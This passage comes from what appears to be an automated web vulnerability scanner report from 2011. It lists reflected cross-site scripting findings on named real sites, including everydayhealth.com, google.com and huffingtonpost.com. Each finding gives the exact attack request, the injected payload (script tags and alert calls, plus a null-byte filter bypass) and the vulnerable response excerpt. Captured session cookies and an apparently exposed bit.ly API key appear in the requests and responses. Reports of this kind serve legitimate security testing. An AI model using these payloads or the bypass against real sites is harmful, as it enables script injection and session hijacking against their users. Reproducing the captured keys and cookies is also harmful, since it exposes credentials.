<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx8ac7e';98481e38035', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.179. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004b806"><script>alert(1)</script>8759e8fbd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4b806"><script>alert(1)</script>8759e8fbd80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPB*XTNmOWRkZmU1ZS0xODQ2LTQ1ZTAtYWNlYS0xY2FjNmI1YzNlZDI1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k0j5vvz5mxglzzntqc5yh03h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49861

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx?%004b806"><script>alert(1)</script>8759e8fbd80=1" />
...[SNIP]...

5.180. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9361'%3b84c782d8b16 was submitted in the REST URL parameter 3. This input was echoed as a9361';84c782d8b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361'%3b84c782d8b16 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPEoo5s1MDkxMWEzZi0yMDZiLTRjYTAtYWNmNS0wZTY1YTU3ODg5ZjQ1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xn1xydrmhljdevihanbstg45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspxa9361';84c782d8b16', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.181. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a9efd"><script>alert(1)</script>8b47a959d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9efd"><script>alert(1)</script>8b47a959d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:35 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPBnhcM4ODI1YTExNS0xOGU4LTQwMDktOTliYi0wZGFlYzYyZDY0MGU1; expires=Wed, 13-Jul-2011 21:36:35 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zln3ns55gb5bpcmolex34fm4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49142

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx?%00a9efd"><script>alert(1)</script>8b47a959d8d=1" />
...[SNIP]...

5.182. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f526d'%3bb39bf44577d was submitted in the REST URL parameter 3. This input was echoed as f526d';b39bf44577d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d'%3bb39bf44577d HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPID-ztmODA3YjBjZC03ZWNhLTRlNTQtODI4OS1lYTk2OWZjNDIxNzI1; expires=Wed, 13-Jul-2011 21:36:37 GMT; path=/
Set-Cookie: ASP.NET_SessionId=w3vie3btzynw5f451gmktxfe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspxf526d';b39bf44577d', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

5.183. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d45e7"><script>alert(1)</script>ec06d481550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d45e7"><script>alert(1)</script>ec06d481550 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1 HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpPE-GLMyMDBhOGIyYi0wNTRiLTQ3ZmYtYTVhZC00MDg4M2QxNGVlMTM1; expires=Wed, 13-Jul-2011 21:36:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jud0jt45dvf1vafmolehev55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47550

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<meta property="og:url" runat="server" id="fburl" content="http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx?%00d45e7"><script>alert(1)</script>ec06d481550=1" />
...[SNIP]...

5.184. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.google.com
Path:	/advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 77493(a)5729f6350b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /advanced_search?77493(a)5729f6350b6=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:57:38 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?77493(a)5729f6350b6\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

5.185. http://www.huffingtonpost.com/ [icid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The value of the icid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8739e"-alert(1)-"26ca8215966 was submitted in the icid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 00:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main58739e"-alert(1)-"26ca8215966";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display_d
...[SNIP]...

5.186. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a79a"-alert(1)-"0ae47100ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/?icid=navbar_huffpo_main5&7a79a"-alert(1)-"0ae47100ee4=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

5.187. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76498"-alert(1)-"978acabc995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/02/?76498"-alert(1)-"978acabc995=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 123154
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=277
Date: Thu, 05 May 2011 10:58:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/?76498"-alert(1)-"978acabc995=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

5.188. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/02/holocaust-memorial-day_n_856638.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a5e"-alert(1)-"d6ccc38ed4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Thu, 05 May 2011 01:00:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 01:00:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 470003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
ent_vertical_name = 'world';
   HPConfig.current_vertical_id = 15;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/02/holocaust-memorial-day_n_856638.html?57a5e"-alert(1)-"d6ccc38ed4b=1";
   HPConfig.hp_static_domain = "s.huffpost.com";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.slideshow_individual_slide_link = false; // by default
   H
...[SNIP]...

5.189. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73665"-alert(1)-"b74fba3530f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/?73665"-alert(1)-"b74fba3530f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 140702
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=287
Date: Thu, 05 May 2011 10:58:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
le_fb_widgets = 1;
   HPConfig.current_vertical_name = "homepage";
   HPConfig.current_vertical_id = -1;
   HPConfig.current_web_address = "www.huffingtonpost.com";
HPConfig.current_uri = "/2011/05/04/?73665"-alert(1)-"b74fba3530f=1";
   HPConfig.inst_type = "prod";
   HPConfig.timestamp_for_clearing_js = "1304533217";
   HPConfig.bit_ly_key = {"user_name":"huffpost","user_key":"R_3db9b90fe8f78f0f2b180e72055462c8"};
   HPConfig.display
...[SNIP]...

5.190. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 225fd"-alert(1)-"d892f95823f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2011/05/04/cnn-poll-finds-that-most-_n_857597.html?225fd"-alert(1)-"d892f95823f=1 HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; 